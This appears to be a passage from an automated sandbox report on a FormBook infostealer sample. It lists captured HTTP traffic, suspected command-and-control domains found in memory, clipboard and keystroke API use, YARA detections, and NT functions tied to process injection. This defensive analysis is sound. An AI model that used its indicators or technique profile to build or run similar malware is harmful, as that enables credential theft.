Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:45:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O0CmSauuZb9VjXu0Bt6h3zJ3qCJuMnT5GXgeBuONyqWRNFArNhVUHtuHu4ZRiWu%2FgpBHegTMol7Ujdpnkp%2B1Da8ooFfwwgUuyvpmS2CWK%2BOnYR7DxqetqxNJtRolzU12u6QqybMsFDg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90013ac8af72440d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1578&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=703&delivery_rate=0&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 e7 97 d7 09 d4 dc Data Ascii: 2cfTMo8WELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC$Dvul6+y.K";HIRDo4"eH^od3ZWoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:45:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=teXYA8hL9HmP9w5hZ1GMrl0zqxTep6oUyyDsEjdwG35yZ8HwDlwBPTML0uQ2%2B2BiFaQrzD9un9DY7qdJeRccCFflc4%2Fn3lvX6bAbI%2BQoGRxSlfj6w%2Bz7mG9MehdLBVzr0GD0UEpL5TM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90013ad88cbb43ab-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1600&rtt_var=800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=723&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 e7 97 d7 09 Data Ascii: 2cfTMo8WELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC$Dvul6+y.K";HIRDo4"eH^od3ZWoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:45:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ym85cU6Dx702HtqUzpwexMGO3cC8ZzFVIo73Ie8AXs%2BL4H4IXlxnDD4GQE3pjAEguJNLwzjiTEb5%2BXFKYjugcnZQm13EEiQrixcvWGaf4Rz2FhXoSsdLFmody325s21YOm7kttAETnE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90013ae88e5542d5-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1744&rtt_var=872&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1736&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 e7 97 d7 09 d4 dc 96 Data Ascii: 2cfTMo8WELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC$Dvul6+y.K";HIRDo4"eH^od3ZWoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:45:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BvqRf2IDFePGO6f4zMLMNNFBRyr6VhsrYuqKK5yj%2BwDGZzCjoqckxXKpodF9DlIq%2B4IwawILDyv%2Bhy%2BJ5YQDVFZ3aRmcVr%2B1XuiM4qG2LJnXYaJhhpnaQdlcmUB5ED%2F8LVtqTOH5dgw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90013af859c242b9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1901&rtt_var=950&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=443&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 Data Ascii: 592<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="te
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 11 Jan 2025 01:46:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 01:46:57 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Sat, 11 Jan 2025 01:47:35 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Sat, 11 Jan 2025 01:47:39 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: ClIUTLKtdeP.exe, 00000009.00000002.3753813140.0000000003540000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://einpisalpace.shop/
Source: ClIUTLKtdeP.exe, 00000009.00000002.3756481473.0000000004C87000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.44756.pizza
Source: ClIUTLKtdeP.exe, 00000009.00000002.3756481473.0000000004C87000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.44756.pizza/pv93/
Source: firefox.exe, 0000000B.00000002.1991641165.00000251C6473000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linkdex.com/bots/)
Source: relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: relog.exe, 00000008.00000002.3751067830.00000000026F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: relog.exe, 00000008.00000002.3751067830.0000000002715000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: relog.exe, 00000008.00000002.3751067830.00000000026F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: relog.exe, 00000008.00000002.3751067830.00000000026F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: relog.exe, 00000008.00000002.3751067830.0000000002715000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3751067830.00000000026F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: relog.exe, 00000008.00000002.3751067830.0000000002715000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: relog.exe, 00000008.00000003.1880051373.0000000007380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: relog.exe, 00000008.00000002.3755712422.00000000073AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ClIUTLKtdeP.exe, 00000009.00000002.3753813140.000000000308A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.newbh.pro/fpja/
Source: relog.exe, 00000008.00000002.3753170617.0000000004366000.00000004.10000000.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000009.00000002.3753813140.00000000039F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/
Source: relog.exe, 00000008.00000002.3753170617.0000000004366000.00000004.10000000.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000009.00000002.3753813140.00000000039F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00F74164

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00F74164

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F73F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00F73F66

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F6001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00F6001C

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F8CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00F8CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3745363879.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3750754693.00000000025E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3756481473.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1679280371.0000000005150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1678559099.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1678063769.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3750980212.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3753130642.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00F03B3A
Source: k9OEsV37GE.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: k9OEsV37GE.exe, 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_31989093-3
Source: k9OEsV37GE.exe, 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e383152c-7
Source: k9OEsV37GE.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a6e6a5bb-e
Source: k9OEsV37GE.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_0f3ebd45-8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0049C4A3 NtClose,	5_2_0049C4A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072B60 NtClose,LdrInitializeThunk,	5_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030735C0 NtCreateMutant,LdrInitializeThunk,	5_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03074340 NtSetContextThread,	5_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03074650 NtSuspendThread,	5_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072B80 NtQueryInformationFile,	5_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072BA0 NtEnumerateValueKey,	5_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072BE0 NtQueryValueKey,	5_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072BF0 NtAllocateVirtualMemory,	5_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072AB0 NtWaitForSingleObject,	5_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072AD0 NtReadFile,	5_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072AF0 NtWriteFile,	5_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072F30 NtCreateSection,	5_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072F60 NtCreateProcessEx,	5_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072F90 NtProtectVirtualMemory,	5_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072FA0 NtQuerySection,	5_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072FB0 NtResumeThread,	5_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072FE0 NtCreateFile,	5_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072E30 NtWriteVirtualMemory,	5_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072E80 NtReadVirtualMemory,	5_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072EA0 NtAdjustPrivilegesToken,	5_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072EE0 NtQueueApcThread,	5_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072D00 NtSetInformationFile,	5_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072D10 NtMapViewOfSection,	5_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072D30 NtUnmapViewOfSection,	5_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072DB0 NtEnumerateKey,	5_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072DD0 NtDelayExecution,	5_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072C00 NtQueryInformationProcess,	5_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072C60 NtCreateKey,	5_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072C70 NtFreeVirtualMemory,	5_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072CA0 NtQueryInformationToken,	5_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072CC0 NtQueryVirtualMemory,	5_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072CF0 NtOpenProcess,	5_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03073010 NtOpenDirectoryObject,	5_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03073090 NtSetValueKey,	5_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030739B0 NtGetContextThread,	5_2_030739B0
